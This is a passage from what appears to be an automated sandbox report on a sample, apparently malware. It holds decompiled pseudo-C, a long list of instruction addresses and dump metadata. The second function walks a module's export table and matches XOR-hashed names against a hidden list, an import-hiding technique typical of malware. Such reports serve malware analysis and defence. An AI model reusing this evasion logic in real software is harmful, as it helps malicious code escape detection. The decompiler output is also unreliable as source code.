							}
							_t240 = _t240 + 1;
							__eflags = _t240 - _t347;
							if(_t240 < _t347) {
								continue;
							}
							goto L15;
						}
						goto L165;
					}
					_t188 =  &_v56;
					goto L37;
				}
				if(_t363 == 0) {
					L6:
					_push(1);
					_push(_t181);
					E6EA010B0();
					_t391 = _t391 + 8;
					goto L8;
				}
				_t349 =  *_t181;
				 *_t363 = _t349;
				if(_t349 == 0) {
					goto L6;
				}
				_t288 = 0;
				while(1) {
					_t288 = _t288 + 1;
					_t350 =  *((char*)(_t181 + _t288 * 2 - 1));
					 *((char*)(_t363 + _t288 * 2 - 1)) = _t350;
					if(_t350 == 0) {
						goto L6;
					}
					_t351 =  *((char*)(_t181 + _t288 * 2));
					 *((char*)(_t363 + _t288 * 2)) = _t351;
					if(_t351 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x6ea1173e
0x6ea11742
0x6ea11744
0x6ea11748
0x6ea1174f
0x6ea11751
0x6ea11754
0x6ea1175a
0x6ea11791
0x6ea11794
0x6ea11794
0x6ea11798
0x6ea117a0
0x6ea117a6
0x6ea117b1
0x6ea117b3
0x6ea11e9e
0x6ea11ea3
0x6ea1182d
0x6ea11832
0x6ea11832
0x6ea11835
0x6ea11838
0x6ea1183b
0x6ea1183d
0x6ea11852
0x6ea11855
0x6ea11855
0x6ea1185b
0x6ea11863
0x6ea11863
0x6ea11863
0x6ea11866
0x6ea1186d
0x6ea11870
0x6ea11876
0x6ea11878
0x6ea1187b
0x6ea1187f
0x6ea11881
0x6ea118d6
0x00000000
0x6ea11883
0x6ea11883
0x6ea11885
0x6ea118c1
0x6ea118c1
0x6ea118c3
0x6ea118c4
0x6ea118c8
0x6ea118cd
0x6ea118d1
0x6ea118d9
0x6ea118d9
0x6ea118dd
0x6ea118e1
0x6ea118e5
0x6ea118e8
0x6ea118ee
0x6ea118f3
0x6ea118f3
0x6ea118f7
0x6ea11900
0x6ea11900
0x6ea11905
0x6ea11907
0x6ea11909
0x6ea11911
0x6ea11913
0x6ea11919
0x6ea1191d
0x6ea11957
0x6ea11a03
0x6ea11a03
0x6ea11a06
0x6ea11a08
0x6ea11a0f
0x6ea11a0f
0x6ea11a11
0x6ea11a15
0x6ea11a1f
0x6ea11a23
0x6ea11a33
0x6ea11a33
0x6ea11921
0x6ea11947
0x6ea11947
0x6ea11949
0x6ea1194a
0x6ea1194f
0x00000000
0x6ea1194f
0x6ea11923
0x6ea11926
0x6ea1192a
0x00000000
0x00000000
0x6ea1192c
0x6ea1192e
0x6ea1192e
0x6ea1192f
0x6ea11934
0x6ea1193a
0x00000000
0x00000000
0x6ea1193c
0x6ea11940
0x6ea11945
0x00000000
0x00000000
0x00000000
0x6ea11945
0x00000000
0x6ea1192e
0x6ea118f9
0x6ea118fe
0x6ea1195f
0x6ea11961
0x6ea11963
0x6ea119ac
0x6ea119ac
0x6ea119b1
0x6ea119b3
0x6ea119b5
0x6ea119bd
0x6ea119bf
0x6ea119c5
0x6ea119c7
0x6ea119c9
0x6ea11a00
0x00000000
0x6ea11a00
0x6ea119cb
0x6ea119cd
0x6ea119f3
0x6ea119f3
0x6ea119f5
0x6ea119f6
0x6ea119fb
0x00000000
0x6ea119fb
0x6ea119cf
0x6ea119d2
0x6ea119d4
0x6ea119d6
0x00000000
0x00000000
0x6ea119d8
0x6ea119d8
0x6ea119da
0x6ea119da
0x6ea119db
0x6ea119e0
0x6ea119e4
0x6ea119e6
0x00000000
0x00000000
0x6ea119e8
0x6ea119ec
0x6ea119ef
0x6ea119f1
0x00000000
0x00000000
0x00000000
0x6ea119f1
0x00000000
0x6ea119da
0x6ea11965
0x6ea11968
0x00000000
0x00000000
0x6ea1196a
0x6ea1196e
0x6ea11971
0x6ea11977
0x6ea1197b
0x6ea1197e
0x6ea11981
0x6ea11981
0x6ea11983
0x6ea11986
0x6ea1198a
0x6ea1198c
0x6ea1198c
0x6ea11992
0x6ea11998
0x6ea1199b
0x6ea1199e
0x00000000
0x00000000
0x6ea119a4
0x6ea119a5
0x6ea119a6
0x6ea119aa
0x00000000
0x00000000
0x00000000
0x6ea119aa
0x6ea11a36
0x6ea11a3a
0x6ea11a3e
0x6ea11a40
0x00000000
0x00000000
0x6ea11a4b
0x6ea11a4e
0x6ea11a56
0x6ea11a5a
0x6ea11a5e
0x6ea11a5e
0x6ea11a61
0x6ea11a65
0x6ea11a69
0x6ea11a69
0x6ea11a6b
0x6ea11a6d
0x6ea11a8a
0x6ea11a96
0x6ea11a9a
0x6ea11a9a
0x6ea11aa0
0x6ea11aa4
0x6ea11aa4
0x6ea11aa9
0x6ea11aad
0x6ea11ab1
0x6ea11ab3
0x00000000
0x00000000
0x6ea11ab9
0x6ea11abc
0x6ea11abe
0x00000000
0x00000000
0x6ea11ac0
0x6ea11ac4
0x6ea11ac8
0x6ea11ace
0x6ea11aeb
0x6ea11aeb
0x6ea11af0
0x6ea11af0
0x6ea11af4
0x6ea11af4
0x6ea11af6
0x6ea11af9
0x6ea11afd
0x6ea11b01
0x6ea11b05
0x6ea11b09
0x6ea11b0c
0x6ea11b0f
0x6ea11b15
0x6ea11b18
0x6ea11b1b
0x6ea11b21
0x6ea11b24
0x6ea11b27
0x6ea11b29
0x00000000
0x00000000
0x6ea11b35
0x6ea11b37
0x6ea11b40
0x6ea11b40
0x6ea11b44
0x6ea11b46
0x00000000
0x00000000
0x6ea11b4c
0x6ea11b4c
0x6ea11b4e
0x6ea11bb1
0x6ea11bb1
0x6ea11bb4
0x6ea11bc8
0x6ea11bd4
0x6ea11bd4
0x6ea11bda
0x6ea11bda
0x6ea11bdf
0x6ea11be3
0x6ea11be7
0x6ea11be9
0x00000000
0x00000000
0x6ea11bef
0x6ea11bf2
0x6ea11bf4
0x00000000
0x00000000
0x6ea11bf6
0x6ea11bfc
0x6ea11c0d
0x6ea11c0d
0x6ea11c12
0x6ea11c17
0x6ea11c19
0x6ea11c1b
0x6ea11c1d
0x6ea11c23
0x6ea11c23
0x6ea11c25
0x6ea11c25
0x6ea11c2c
0x6ea11c2e
0x6ea11c31
0x6ea11c31
0x6ea11c33
0x6ea11c37
0x6ea11d7b
0x6ea11d7b
0x6ea11d82
0x6ea11d84
0x6ea11d8a
0x6ea11d8c
0x6ea11d8e
0x6ea11dc8
0x00000000
0x6ea11dc8
0x6ea11d90
0x6ea11d92
0x6ea11db8
0x6ea11db8
0x6ea11dba
0x6ea11dbb
0x6ea11dc0
0x00000000
0x6ea11dc0
0x6ea11d94
0x6ea11d97
0x6ea11d99
0x6ea11d9b
0x00000000
0x00000000
0x6ea11d9d
0x6ea11d9d
0x6ea11d9f
0x6ea11d9f
0x6ea11da0
0x6ea11da5
0x6ea11da9
0x6ea11dab
0x00000000
0x00000000
0x6ea11dad
0x6ea11db1
0x6ea11db4
0x6ea11db6
0x00000000
0x00000000
0x00000000
0x6ea11db6
0x00000000
0x6ea11d9f
0x6ea11c3d
0x6ea11c41
0x00000000
0x00000000
0x6ea11c47
0x6ea11c49
0x6ea11cb0
0x6ea11cb5
0x6ea11cb5
0x6ea11cb8
0x6ea11cbb
0x6ea11cbe
0x6ea11cc0
0x6ea11cd6
0x6ea11cd9
0x6ea11cd9
0x6ea11cdf
0x6ea11ce7
0x6ea11ce7
0x6ea11ce7
0x6ea11cea
0x6ea11cf4
0x6ea11cf7
0x6ea11cfa
0x6ea11d00
0x6ea11d02
0x6ea11d08
0x6ea11d0a
0x6ea11d0c
0x6ea11d43
0x00000000
0x6ea11d0e
0x6ea11d0e
0x6ea11d10
0x6ea11d36
0x6ea11d36
0x6ea11d38
0x6ea11d39
0x6ea11d3e
0x6ea11d46
0x6ea11d46
0x6ea11d4c
0x6ea11d4f
0x6ea11d51
0x6ea11d51
0x6ea11d53
0x00000000
0x00000000
0x6ea11d59
0x6ea11d5d
0x6ea11d63
0x6ea11d63
0x6ea11d66
0x6ea11d67
0x6ea11d69
0x6ea11d6b
0x00000000
0x00000000
0x6ea11d6d
0x6ea11d6f
0x6ea11dd0
0x00000000
0x6ea11dd0
0x6ea11d71
0x6ea11d71
0x6ea11d73
0x00000000
0x00000000
0x6ea11d61
0x6ea11d62
0x6ea11d62
0x6ea11d62
0x6ea11d63
0x6ea11d12
0x6ea11d15
0x6ea11d17
0x6ea11d19
0x00000000
0x00000000
0x6ea11d1b
0x6ea11d1b
0x6ea11d1d
0x6ea11d1d
0x6ea11d1e
0x6ea11d23
0x6ea11d27
0x6ea11d29
0x00000000
0x00000000
0x6ea11d2b
0x6ea11d2f
0x6ea11d32
0x6ea11d34
0x00000000
0x00000000
0x00000000
0x6ea11d34
0x00000000
0x6ea11d1d
0x6ea11d0c
0x6ea11cc2
0x00000000
0x6ea11cc2
0x6ea11c4b
0x6ea11c4f
0x6ea11c4f
0x6ea11c52
0x6ea11c66
0x6ea11c72
0x6ea11c72
0x6ea11c78
0x6ea11c78
0x6ea11c7d
0x6ea11c81
0x6ea11c85
0x6ea11c87
0x00000000
0x00000000
0x6ea11c8d
0x6ea11c90
0x6ea11c92
0x00000000
0x00000000
0x6ea11c94
0x6ea11c9a
0x6ea11cab
0x6ea11cab
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea11c9c
0x6ea11c9c
0x6ea11c9c
0x6ea11ca0
0x00000000
0x00000000
0x6ea11ca2
0x6ea11ca3
0x6ea11ca9
0x00000000
0x00000000
0x00000000
0x6ea11ca9
0x00000000
0x6ea11c9c
0x6ea11dd9
0x6ea11ddc
0x00000000
0x6ea11ddc
0x6ea11c56
0x6ea11c58
0x6ea11c58
0x6ea11c5b
0x6ea11c5b
0x6ea11c5f
0x00000000
0x00000000
0x6ea11c61
0x6ea11c62
0x6ea11c64
0x00000000
0x00000000
0x00000000
0x6ea11c64
0x00000000
0x6ea11c5b
0x6ea11c1f
0x6ea11c21
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea11bfe
0x6ea11bfe
0x6ea11bfe
0x6ea11c02
0x00000000
0x00000000
0x6ea11c04
0x6ea11c05
0x6ea11c0b
0x00000000
0x00000000
0x00000000
0x6ea11c0b
0x00000000
0x6ea11bfe
0x6ea11de3
0x6ea11de6
0x00000000
0x6ea11de6
0x6ea11bb8
0x6ea11bba
0x6ea11bba
0x6ea11bbd
0x6ea11bbd
0x6ea11bc1
0x00000000
0x00000000
0x6ea11bc3
0x6ea11bc4
0x6ea11bc6
0x00000000
0x00000000
0x00000000
0x6ea11bc6
0x00000000
0x6ea11bbd
0x6ea11b50
0x6ea11b55
0x6ea11b57
0x6ea11b59
0x6ea11b61
0x6ea11b63
0x6ea11b69
0x6ea11b6b
0x6ea11b6d
0x6ea11ba7
0x00000000
0x6ea11ba7
0x6ea11b6f
0x6ea11b71
0x6ea11b97
0x6ea11b97
0x6ea11b99
0x6ea11b9a
0x6ea11b9f
0x00000000
0x6ea11b9f
0x6ea11b73
0x6ea11b76
0x6ea11b78
0x6ea11b7a
0x00000000
0x00000000
0x6ea11b7c
0x6ea11b7c
0x6ea11b7e
0x6ea11b7e
0x6ea11b7f
0x6ea11b84
0x6ea11b88
0x6ea11b8a
0x00000000
0x00000000
0x6ea11b8c
0x6ea11b90
0x6ea11b93
0x6ea11b95
0x00000000
0x00000000
0x00000000
0x6ea11b95
0x00000000
0x6ea11b7e
0x6ea11b39
0x6ea11b3a
0x6ea11b3e
0x00000000
0x00000000
0x00000000
0x6ea11b3e
0x6ea11ded
0x6ea11df0
0x6ea11df6
0x6ea11df6
0x6ea11df7
0x00000000
0x00000000
0x6ea11dfd
0x6ea11e06
0x6ea11e0b
0x6ea11e0e
0x6ea11e12
0x00000000
0x00000000
0x6ea11e18
0x6ea11e1b
0x6ea11e1f
0x6ea11e1f
0x6ea11e20
0x6ea11e21
0x6ea11e2b
0x6ea11e31
0x6ea11e34
0x6ea11e36
0x00000000
0x00000000
0x6ea11e38
0x6ea11e3b
0x00000000
0x00000000
0x00000000
0x6ea11e3d
0x00000000
0x6ea11e1f
0x6ea11ad0
0x6ea11ad4
0x6ea11ad4
0x6ea11ad8
0x00000000
0x00000000
0x6ea11ade
0x6ea11adf
0x6ea11ae5
0x00000000
0x00000000
0x6ea11ae7
0x00000000
0x6ea11ae7
0x6ea11e42
0x6ea11e42
0x6ea11e46
0x6ea11e46
0x6ea11e48
0x00000000
0x00000000
0x6ea11e4e
0x00000000
0x00000000
0x00000000
0x6ea11e54
0x6ea11e59
0x6ea11e5c
0x6ea11e60
0x6ea11e62
0x00000000
0x6ea11e62
0x6ea11a6f
0x6ea11a73
0x6ea11a75
0x6ea11a75
0x6ea11a77
0x6ea11a77
0x6ea11a7b
0x00000000
0x00000000
0x6ea11a81
0x6ea11a82
0x6ea11a84
0x00000000
0x00000000
0x6ea11a86
0x00000000
0x6ea11a86
0x00000000
0x6ea11e68
0x6ea11e68
0x6ea11e6b
0x6ea11e6f
0x6ea11e6f
0x00000000
0x6ea11e77
0x00000000
0x6ea118fe
0x6ea11887
0x6ea1188a
0x6ea1188c
0x6ea1188e
0x00000000
0x00000000
0x6ea11890
0x6ea11894
0x6ea11894
0x6ea11896
0x6ea1189a
0x6ea1189d
0x6ea1189d
0x6ea1189e
0x6ea118a3
0x6ea118a7
0x6ea118a9
0x00000000
0x00000000
0x6ea118ab
0x6ea118af
0x6ea118b2
0x6ea118b4
0x00000000
0x00000000
0x00000000
0x6ea118b4
0x6ea118b6
0x6ea118ba
0x6ea118be
0x00000000
0x6ea118be
0x6ea11881
0x6ea1183f
0x00000000
0x6ea1183f
0x6ea117bb
0x6ea117bb
0x6ea117be
0x6ea117d6
0x6ea117da
0x6ea117e6
0x6ea117e6
0x6ea117ec
0x6ea117ec
0x6ea117f1
0x6ea117f5
0x6ea117f9
0x6ea117fb
0x00000000
0x00000000
0x6ea11801
0x6ea11804
0x6ea11806
0x00000000
0x00000000
0x6ea11808
0x6ea1180e
0x6ea11823
0x6ea11823
0x6ea11828
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea11810
0x6ea11810
0x6ea11810
0x6ea11814
0x00000000
0x00000000
0x6ea1181a
0x6ea1181b
0x6ea11821
0x00000000
0x00000000
0x00000000
0x6ea11821
0x6ea11e7c
0x6ea11e7c
0x6ea11e7f
0x6ea11e8d
0x6ea11e81
0x6ea11e81
0x6ea11e84
0x6ea11e84
0x00000000
0x6ea11e7f
0x6ea11e97
0x6ea11e9a
0x00000000
0x6ea11e9a
0x6ea117c2
0x6ea117c4
0x6ea117c4
0x6ea117c7
0x6ea117c7
0x6ea117cb
0x00000000
0x00000000
0x6ea117d1
0x6ea117d2
0x6ea117d4
0x00000000
0x00000000
0x00000000
0x6ea117d4
0x00000000
0x6ea117c7
0x6ea117a8
0x00000000
0x6ea117a8
0x6ea1175e
0x6ea11784
0x6ea11784
0x6ea11786
0x6ea11787
0x6ea1178c
0x00000000
0x6ea1178c
0x6ea11760
0x6ea11763
0x6ea11767
0x00000000
0x00000000
0x6ea11769
0x6ea1176b
0x6ea1176b
0x6ea1176c
0x6ea11771
0x6ea11777
0x00000000
0x00000000
0x6ea11779
0x6ea1177d
0x6ea11782
0x00000000
0x00000000
0x00000000
0x6ea11782
0x00000000

Strings

@, xrefs: 6EA11798

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction ID: a16d5623f9abd47eb7e1de49bb1d446ba59ba6bc0d9667f76df13d456ece056e
Opcode Fuzzy Hash: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction Fuzzy Hash: 27326E70A0C3934FD7018EA984903BA7FE26FF6314F1C86ADD8E14F255EA348989C746

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F9E70, Relevance: 1.8, Strings: 1, Instructions: 591
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E6E9F9E70(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t212;
				void* _t214;
				void* _t218;
				void* _t287;
				void* _t289;
				void* _t290;
				void* _t291;
				char* _t324;
				void* _t337;
				void* _t340;
				signed int _t358;
				char _t360;
				intOrPtr _t369;
				intOrPtr _t370;
				void* _t371;
				void* _t372;
				void* _t374;
				void* _t376;
				void* _t391;
				void* _t410;
				intOrPtr* _t438;
				signed int _t528;
				char* _t529;
				void* _t530;
				intOrPtr* _t533;
				void* _t534;
				signed int _t537;
				void* _t538;
				void* _t539;
				void* _t541;
				intOrPtr _t542;
				void* _t550;
				signed int _t551;
				signed int _t552;
				signed int _t553;
				intOrPtr* _t554;
				intOrPtr _t555;
				void* _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				intOrPtr _t559;
				void* _t561;
				intOrPtr* _t563;
				void* _t564;

				_t512 = __edx;
				_t557 = __edx;
				_t369 = __ecx;
				if(E6EA24850(E6EA19640(__ecx, 0), __edx) == 0 ||  *((char*)(E6EA03930(__ecx, 0, _t530, _t539) + 0xb)) != 0x20) {
					_t212 = E6EA248C0(E6EA19640(_t369, 0), _t512);
					__eflags = _t212;
					if(_t212 == 0) {
						L36:
						__eflags = 0;
						return 0;
					} else {
						_t214 = E6EA03930(_t369, 0, _t530, _t539);
						__eflags =  *((char*)(_t214 + 0xb)) - 0x40;
						if( *((char*)(_t214 + 0xb)) != 0x40) {
							goto L36;
						} else {
							 *((intOrPtr*)(_t563 + 0x10)) = 0x40;
							goto L6;
						}
					}
				} else {
					 *((intOrPtr*)(_t563 + 0x10)) = 0x20;
					L6:
					 *((intOrPtr*)(_t563 + 0x4e8)) = 0;
					 *((intOrPtr*)(_t563 + 0x4ec)) = 0;
					 *((intOrPtr*)(_t563 + 0x4f0)) = 0;
					E6EA106A0(_t563 + 0x470, _t557, 0);
					E6EA02370(_t563 + 0x474, _t530, _t539);
					_t218 = E6EA16EC0(_t563 + 0x474,  *((intOrPtr*)(_t563 + 0x478)), 0);
					E6E9FAC00(_t563 + 0x47c, 9);
					E6EA0FDB0(_t563 + 0x480, _t563 + 0x484);
					E6EA16EC0(_t218,  *((intOrPtr*)(_t563 + 0x488)), 0);
					E6EA10B10(_t563 + 0x484);
					E6EA08CA0(_t563 + 0x47c);
					E6EA10B10(_t563 + 0x474);
					_t391 = _t563 + 0x18c;
					 *((intOrPtr*)(_t391 - 0x10)) = 0;
					 *((char*)(_t391 - 0xc)) = 1;
					 *((intOrPtr*)(_t391 - 8)) = 0;
					 *((intOrPtr*)(_t391 - 4)) = 3;
					E6EA087A0(_t391);
					_push(1);
					if(E6EA1CEA0(_t369, _t563 + 0x180,  *((intOrPtr*)(_t563 + 0x46c)), _t563 + 0x484, _t218) != 0) {
						 *((intOrPtr*)(_t563 + 4)) = _t557;
						_t538 = _t563 + 0x1c0;
						_t556 = _t563 + 0x4c4;
						goto L8;
						L8:
						E6EA08AB0(_t563 + 0x4c4, _t538, 0);
						E6EA0FDB0(_t563 + 0x4c0, _t556);
						E6EA137E0(_t563 + 0x4f0,  *((intOrPtr*)(_t563 + 0x4c8)),  *((intOrPtr*)(_t563 + 0x4e8)));
						E6EA10B10(_t556);
						E6EA08CA0(_t563 + 0x4bc);
						if(E6EA1D0E0(_t563 + 0x17c) != 0) {
							goto L8;
						} else {
							_t557 =  *((intOrPtr*)(_t563 + 4));
						}
					}
					E6EA08CA0(_t563 + 0x18c);
					if( *((char*)(_t563 + 0x180)) != 0) {
						_t555 =  *((intOrPtr*)(_t563 + 0x17c));
						if(_t555 == 0 || _t555 == 0xffffffff) {
							_t360 = 1;
						} else {
							_t360 = 0;
						}
						if(_t360 == 0) {
							E6EA1CE70(_t555);
						}
					}
					 *((intOrPtr*)(_t563 + 0x17c)) = 0;
					E6EA10B10(_t563 + 0x46c);
					 *((intOrPtr*)(_t563 + 0x440)) = 0;
					 *((intOrPtr*)(_t563 + 0x444)) = 0;
					 *((intOrPtr*)(_t563 + 0x448)) = 0;
					_t541 = L6EA1E170(0,  *((intOrPtr*)(_t563 + 0x4e8)));
					 *((intOrPtr*)(_t563 + 0x14)) =  *((intOrPtr*)(_t563 + 0x4e8));
					 *_t563 = _t369;
					 *((intOrPtr*)(_t563 + 4)) = _t557;
					_t558 = 0;
					while(1) {
						_t542 =  ==  ? _t558 : _t541;
						_t533 = E6EA17600(_t563 + 0x4ec, _t542);
						_t516 = _t533;
						if(E6E9FA830( *((intOrPtr*)(_t563 + 0x10)), _t533, _t542) == 0) {
							goto L35;
						}
						E6EA106A0(_t563 + 0x4d0, _t558, 0);
						E6EA02370(_t563 + 0x4d4, _t533, _t542);
						E6EA16EC0(E6EA16EC0(_t563 + 0x4d4,  *((intOrPtr*)(_t563 + 0x4d8)), 0),  *_t533, 0);
						E6EA10B10(_t563 + 0x4d4);
						E6EA1A280(_t563 + 0x49c,  *((intOrPtr*)(_t563 + 0x4d8)), 1, 0, 0x80);
						L6EA1A520(_t563 + 0x494, _t516, _t563 + 0x4a4, 0);
						E6EA24A20(_t563 + 0x4dc, E6EA19640(_t563 + 0x4a4, 0));
						L6EA19510(_t563 + 0x4a0);
						L6EA1BDC0(_t563 + 0x49c, 0);
						if(E6EA17620(_t563 + 0x4dc, _t542) != 0) {
							 *((intOrPtr*)(_t563 + 0x4b0)) = _t558;
							_t410 = _t563 + 0x4dc;
							 *((intOrPtr*)(_t410 - 0x28)) = _t558;
							 *((intOrPtr*)(_t410 - 0x24)) = _t558;
							L6EA17560(_t410, _t533, _t542);
							__eflags =  *((char*)(_t563 + 0x49c));
							if( *((char*)(_t563 + 0x49c)) != 0) {
								E6EA1BE30(_t563 + 0x498, _t542);
							}
						} else {
							if( *((intOrPtr*)(_t563 + 0x4dc)) > 0) {
								 *((intOrPtr*)(_t563 + 0xc)) = _t533;
								 *((intOrPtr*)(_t563 + 8)) = _t542;
								_t376 = _t563 + 0x4f4;
								do {
									_t554 = E6EA17600(_t563 + 0x4e0, _t558);
									E6EA11020(_t554, _t376);
									_t358 = E6EA1D620( *((intOrPtr*)(_t563 + 0x4f4)), E6EA16040( *((intOrPtr*)(_t563 + 0x4f4)), 0x7fffffff));
									E6EA10B10(_t376);
									_t537 = _t358 ^ 0x38ba5c7b;
									_t528 = 0;
									while(_t537 !=  *((intOrPtr*)(0x6ea29440 + _t528 * 4))) {
										_t528 = _t528 + 1;
										if(_t528 < 0x30) {
											continue;
										} else {
											_t529 =  *_t554;
											if(_t529 != 0) {
												 *_t529 = 0;
											}
										}
										goto L27;
									}
									L27:
									_t558 = _t558 + 1;
								} while (_t558 <  *((intOrPtr*)(_t563 + 0x4dc)));
								_t533 =  *((intOrPtr*)(_t563 + 0xc));
								_t558 = 0;
								_t542 =  *((intOrPtr*)(_t563 + 8));
							}
							L6EA171F0(_t563 + 0x4b4, _t542, E6EA13EC0(_t563 + 0x4dc));
							L6EA17560(_t563 + 0x4dc, _t533, _t542);
							if( *((char*)(_t563 + 0x49c)) != 0) {
								E6EA1BE30(_t563 + 0x498, _t542);
							}
						}
						E6EA08CA0(_t563 + 0x48c);
						E6EA10B10(_t563 + 0x4cc);
						if(E6EA17620(_t563 + 0x4b0, _t542) != 0) {
							L6EA17560(_t563 + 0x4b0, _t533, _t542);
							goto L35;
						}
						_t370 =  *_t563;
						_t559 =  *((intOrPtr*)(_t563 + 4));
						_t543 = L6EA1E170(0,  *((intOrPtr*)(_t563 + 0x4b0)));
						E6EA137E0(_t563 + 0x448,  *_t533,  *((intOrPtr*)(_t563 + 0x440)));
						E6EA137E0(_t563 + 0x448,  *((intOrPtr*)(E6EA17600(_t563 + 0x4b4, _t252))),  *((intOrPtr*)(_t563 + 0x440)));
						L6EA17560(_t563 + 0x4b0, _t533, _t252);
						L6EA17560(_t563 + 0x4e8, _t533, _t252);
						E6EA106A0(_t563 + 0x450, _t559, 0);
						E6EA106A0(_t563 + 0x458, _t559, 0);
						E6EA16EC0(_t563 + 0x454,  *((intOrPtr*)(E6EA17600(_t563 + 0x444, 0))), 0);
						E6EA16EC0(_t563 + 0x45c,  *((intOrPtr*)(E6EA17600(_t563 + 0x444, 1))), 0);
						E6EA106A0(_t563 + 0x460, _t559, 0);
						E6EA02370(_t563 + 0x464, _t533, _t252);
						E6EA16EC0(E6EA16EC0(_t563 + 0x464,  *((intOrPtr*)(_t563 + 0x468)), 0),  *((intOrPtr*)(_t563 + 0x458)), 0);
						E6EA10B10(_t563 + 0x464);
						E6EA1A280(_t563 + 0x42c,  *((intOrPtr*)(_t563 + 0x468)), 1, 0, 0x80);
						L6EA1A520(_t563 + 0x424,  *((intOrPtr*)(_t563 + 0x4b0)), _t563 + 0x430, 0);
						__eflags =  *((char*)(_t563 + 0x42c));
						if( *((char*)(_t563 + 0x42c)) != 0) {
							E6EA1BE30(_t563 + 0x428, _t543);
						}
						E6EA08CA0(_t563 + 0x41c);
						__eflags = E6EA19660(_t563 + 0x430);
						if(__eflags == 0) {
							E6EA106A0(_t563 + 0x3e4, _t559, 0);
							_push(0);
							E6EA19350(_t563 + 0x3f4);
							_push(0);
							E6EA19350(_t563 + 0x404);
							_t438 = _t563 + 0x410;
							 *_t438 = 0;
							 *((intOrPtr*)(_t438 + 4)) = 0;
							 *((intOrPtr*)(_t438 + 8)) = 0;
							L6EA17560(_t438, _t533, _t543);
							L6EA1A110(_t563 + 0x400);
							_t280 = L6EA1A110(_t563 + 0x3f0);
							__eflags =  *((intOrPtr*)(_t563 + 0x10)) - 0x20;
							if( *((intOrPtr*)(_t563 + 0x10)) != 0x20) {
								__eflags =  *((intOrPtr*)(_t563 + 0x10)) - 0x40;
								if( *((intOrPtr*)(_t563 + 0x10)) == 0x40) {
									_t337 = E6EA247D0(E6EA19640(_t563 + 0x434, 0));
									_t280 = _t337 + 0x88;
									__eflags = _t337 + 0x88;
								}
							} else {
								_t280 = E6EA247D0(E6EA19640(_t563 + 0x434, 0)) + 0x78;
							}
							_t534 = E6EA24830(E6EA19640(_t563 + 0x434, 0),  *_t280);
							 *((intOrPtr*)(_t563 + 0x3ec)) =  *((intOrPtr*)(_t534 + 0x10));
							E6EA10B30(_t563 + 0x3e8,  *((intOrPtr*)(_t534 + 0xc)), E6EA24830(E6EA19640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0xc))));
							_t287 = E6EA24830(E6EA19640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0x20)));
							__eflags =  *((intOrPtr*)(_t534 + 0x18));
							if( *((intOrPtr*)(_t534 + 0x18)) > 0) {
								 *_t563 = _t370;
								_t553 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t374 = _t287;
								do {
									E6EA137E0(_t563 + 0x418, E6EA24830(E6EA19640(_t563 + 0x434, 0),  *((intOrPtr*)(_t374 + _t553 * 4))),  *((intOrPtr*)(_t563 + 0x410)));
									_t553 = _t553 + 1;
									__eflags = _t553 -  *((intOrPtr*)(_t534 + 0x18));
								} while (_t553 <  *((intOrPtr*)(_t534 + 0x18)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							_t289 = E6EA24830(E6EA19640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0x24)));
							__eflags =  *((intOrPtr*)(_t534 + 0x18));
							if( *((intOrPtr*)(_t534 + 0x18)) > 0) {
								 *_t563 = _t370;
								_t552 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t561 = _t289;
								do {
									E6EA19670(_t563 + 0x404, E6EA19650(_t563 + 0x400) + 2);
									 *((short*)(E6EA19640(_t563 + 0x404, E6EA19650(_t563 + 0x400) + 0xfffffffe))) =  *(_t561 + _t552 * 2) & 0x0000ffff;
									_t552 = _t552 + 1;
									__eflags = _t552 -  *((intOrPtr*)(_t534 + 0x18));
								} while (_t552 <  *((intOrPtr*)(_t534 + 0x18)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							_t290 = E6EA19640(_t563 + 0x434, 0);
							_t523 =  *((intOrPtr*)(_t534 + 0x1c));
							_t291 = E6EA24830(_t290,  *((intOrPtr*)(_t534 + 0x1c)));
							__eflags =  *((intOrPtr*)(_t534 + 0x14));
							if( *((intOrPtr*)(_t534 + 0x14)) > 0) {
								 *_t563 = _t370;
								_t551 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t372 = _t291;
								do {
									E6EA19670(_t563 + 0x3f4, E6EA19650(_t563 + 0x3f0) + 1);
									_t324 = E6EA19640(_t563 + 0x3f4, E6EA19650(_t563 + 0x3f0) - 1);
									_t523 = _t324;
									__eflags =  *((intOrPtr*)(_t372 + _t551 * 4));
									_t551 = _t551 + 1;
									 *_t324 = 0 | __eflags > 0x00000000;
									__eflags = _t551 -  *((intOrPtr*)(_t534 + 0x14));
								} while (_t551 <  *((intOrPtr*)(_t534 + 0x14)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							 *_t563 = 0;
							_push(0);
							E6EA19350(_t563 + 0x150);
							_t550 = _t563 + 4;
							 *((intOrPtr*)(_t550 + 0x158)) = 0;
							 *((intOrPtr*)(_t550 + 0x15c)) = 0;
							 *((intOrPtr*)(_t550 + 0x160)) = 0;
